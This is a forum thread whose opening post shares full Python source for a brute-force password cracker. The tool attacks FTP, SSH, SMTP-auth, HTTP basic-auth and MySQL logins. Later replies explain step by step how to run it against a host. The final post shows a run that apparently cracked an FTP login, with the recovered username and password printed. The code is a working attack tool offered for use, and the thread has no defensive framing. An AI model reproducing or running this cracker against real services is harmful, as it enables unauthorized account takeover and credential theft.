Author Topic: [Python] Automated password guesser (Read 2043 times)

bluejay · « **on:** November 19, 2011, 12:06:38 PM »

A simple remote password cracker. It can brute force ftp, ssh, smtp-auth, htaccess and mysql. I have very intimidatingly named it theblackgoose

Code: [Select]

#!/usr/bin/env python
uninstalled = []

try:
    import ftplib
except ImportError:
    uninstalled.append("ftp")
    print "ftplib not installed, cannot crack ftp"

try:
    import paramiko
except ImportError:
    uninstalled.append("ssh")
    print "paramiko not installed, cannot crack ssh"

try:
    import smtplib
except ImportError:
    uninstalled.append("smtp")
    print "smtplib not installed, cannot crack smtp-auth"

try:
    import MySQLdb
except ImportError:
    uninstalled.append("mysql")
    print "MySQLdb not installed, cannot crack mysql"

import sys, urllib2, random # safe to assume these are installed

if len(sys.argv) != 5:
    print "Usage: ./theblackgoose.py target service /path/to/username/file /path/to/password/file"
    sys.exit()

elif sys.argv[2] in uninstalled:
    print "Required libraries not installed"
    sys.exit()

try:
    usernames = open(sys.argv[3], "r").readlines()
except:
    print "Could not open username file!"
    sys.exit()

try:
    passwords = open(sys.argv[4], "r").readlines()
except:
    print "Could not open password file!"
    sys.exit()

index = 0
while index < len(usernames):
    usernames[index] = usernames[index].replace("\n", "")
    index += 1

index = 0
while index < len(passwords):
    passwords[index] = passwords[index].replace("\n", "")
    index += 1

random.shuffle(usernames); random.shuffle(passwords)

quit = raw_input("Exit on first successful login? ")

def ftpcrack(target, userlist, passlist):
    print "Attacking target..."
    for user in userlist:
        for passwd in passlist:
            try:
                ftp = ftplib.FTP(target)
            except:
                print "Connection refused"
                sys.exit()
            try:
                ftp.login(user, passwd)
                print "Login success! Username:", user, "password:", passwd
                if quit:
                    sys.exit()
            except:
                pass


def sshcrack(target, userlist, passlist):
    print "Attacking target..."
    for user in userlist:
        for passwd in passlist:
            try:
                ssh = paramiko.SSHClient()
                ssh.connect(target, username=user, password=passwd)
                print "Login success! Username:", user, "password:", passwd
                if quit:
                    sys.exit()
            except:
                pass



def smtpcrack(target, userlist, passlist):
    print "Attacking target..."
    for user in userlist:
        for passwd in passlist:
            try:
                server = smtplib.SMTP(target)
            except:
                print "Connection refused"
                sys.exit()
            try:
                server.starttls()    # might be better if we use TLS encryption
            except:
                pass            # but the server might not support it
            try:
                server.login(user, passwd)
                print "Login success! Username:", user, "password:", passwd
                if quit:
                    sys.exit()
            except:
                pass

def htcrack(url, userlist, passlist):
    print "Attacking target..."
    passmanager = urllib2.HTTPPasswordMgrWithDefaultRealm()
    for user in userlist:
        for passwd in passlist:
            passmanager.add_password(None, url, user, passwd)
            authhandler = urllib2.HTTPBasicAuthHandler(passmanager)
            opener = urllib2.build_opener(authhandler)
            urllib2.install_opener(opener)
            try:
                urllib2.urlopen(url)
                print "Login found! Username:", user, "password:", passwd
                if quit:
                    sys.exit()
            except:
                pass


def mysqlcrack(target, userlist, passlist):
    print "Attacking target..."
    for user in userlist:
        for passwd in passlist:
            try:
                data = MySQLdb.connect(host=target, port=3306, user=user, passwd=passwd)
                print "Login success! Username:", user, "password:", passwd
                if quit:
                    sys.exit()
            except:
                pass

if sys.argv[2] == "ftp":
    ftpcrack(sys.argv[1], usernames, passwords)

elif sys.argv[2] == "ssh":
    sshcrack(sys.argv[1], usernames, passwords)

elif sys.argv[2] == "smtp":
    smtpcrack(sys.argv[1], usernames, passwords)

elif sys.argv[2] == "htaccess":
    htcrack(sys.argv[1], usernames, passwords)

elif sys.argv[2] == "mysql":
    mysqlcrack(sys.argv[1], usernames, passwords)

FuyuKitsune · « **Reply #1 on:** November 19, 2011, 05:21:18 PM »

Cool. Nice example of a function Python program. All the stuff we do doesn't do anything useful.

I learned a bit about 2.7 with this. 2.7 handles loops differently than I'm used to. In 3.2 you can use

Code: [Select]

for index in usernames:
	index = index.strip()    #or .replace() or whatever you like

but in 2.7 that loop creates a new instance of the variable index rather than referencing the list, so assigning index to a value doesn't affect the original.

Flikka · « **Reply #2 on:** December 10, 2011, 11:48:47 PM »

I, need simple stuff.
Why can't someone make a thing where you type in the address to the site, type in the username you want,, then bruteforce.

Nope. Gotta be complicated.

Tsar · « **Reply #3 on:** December 11, 2011, 01:02:45 AM »

Nice code, simple and reusable, very nice.

Quote from: Flikka on December 10, 2011, 11:48:47 PM

I, need simple stuff.
Why can't someone make a thing where you type in the address to the site, type in the username you want,, then bruteforce.
Nope. Gotta be complicated.

Because it keeps it out of the hands of noobs.

Kulverstukas · « **Reply #4 on:** December 11, 2011, 08:25:51 AM »

Heh I'll stick with Medusa for now

But nice code, really

Chandi · « **Reply #5 on:** January 03, 2012, 11:31:50 AM »

How do i use this to crack a password ? I may sound like a noob but if your willing to teach im ready to learn rather than using it for stupid reasons.

sp0rk · « **Reply #6 on:** January 03, 2012, 12:30:22 PM »

Quote from: Chandi on January 03, 2012, 11:31:50 AM

How do i use this to crack a password ? I may sound like a noob but if your willing to teach im ready to learn rather than using it for stupid reasons.

This is the source code (python specifically) for a password brute forcer he's sharing with the community. I'm personally not a great coder so I'm looking it over to learn, so I can't offer you much advice. I think there are a few things in the tutorials section or the general hacking/security forum about bruteforcing. Which might I add isn't usually advised, from what I understand bruteforcers make your attempts at compromising a target horribly transparent. On that basis alone I wouldn't use one myself.
I'm glad the forum isn't filling up with people asking "yo how do I h4x0r this Lulz" in every thread, I think if you PM some of the more knowledgeable guys and dig around the forum you'll find what you need to "get good". I'd recommend doing ALOT of reading before ever trying to compromise something, I am paranoid but whatever, if you want to use this to hack a facebook/youtube account or something you'd be better off just not trying.

m0rph · « **Reply #7 on:** January 03, 2012, 02:30:46 PM »

I like it a lot if this was one of your first tries at writing a tool. I like it even more that you threw in various protocols, I don't often see homebrew scripts that brute force smtp. Good job man.

Noobs, this link will tell you how to use this program:
http://docs.python.org/reference/

theblackgoose · « **Reply #8 on:** February 07, 2012, 08:50:24 PM »

Hi there, I am a real noob, and I would like to test my ftp server, I tried to run this script but I do not know how to set the target to the password and username files. I have attached some files so you could identify what I am doing wrong. Huge thanks in advance

Python · « **Reply #9 on:** February 07, 2012, 10:55:59 PM »

Open up terminal and cd into the directory of the py file. Then type

Code: [Select]

python theblackgoose.py <host> service(ftp) <username_file> <password_file>

For password and username files you enter the directory of the password and username files.
For example if they are both on your desktop you would type:
/home/username/Desktop/passwords.txt
and
/home/username/Desktop/usernames.txt

Your final command would look like

Code: [Select]

python theblackgoose.py <host> <service> /home/username/Desktop/usernames.txt /home/username/Desktop/passwords.txt
That's as simple as I can make it. If you still don't understand then quote me and explain to me what you don't understand.

theblackgoose2 · « **Reply #10 on:** February 08, 2012, 12:17:41 AM »

Huge thanks for the help,
It is a lot more clear to me how to run the script.

1 - I am running Win7x64sp1
2 - I have python on my usb stick (f:\python) (a portable version) (http://portablepython.com/wiki/PortablePython3.2.1.1)
3 - I have placed the file in the same place as the interpreter
F:\python\theblackgoose.py
so I have done this:
start - run - cmd
cd f:\python

Code: [Select]

python.exe theblackgoose.py 192.168.1.105 ftp f:\script\py\username.txt f:\script\py\password.txt

and I have got this message:

Code: [Select]

paramiko not installed, cannot crack ssh
 MySQLdb not installed, cannot crack mysql
 Exit on first successful login? y
 Attacking target...
 Login success! Username: Suiram password: Th!nkc3ntr2
F:\python>

PS:
I had to create another user as the first one had problems with authentication.